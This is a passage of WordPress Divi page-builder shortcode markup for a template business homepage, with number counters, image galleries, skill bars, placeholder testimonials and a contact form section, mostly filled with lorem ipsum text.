_builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" 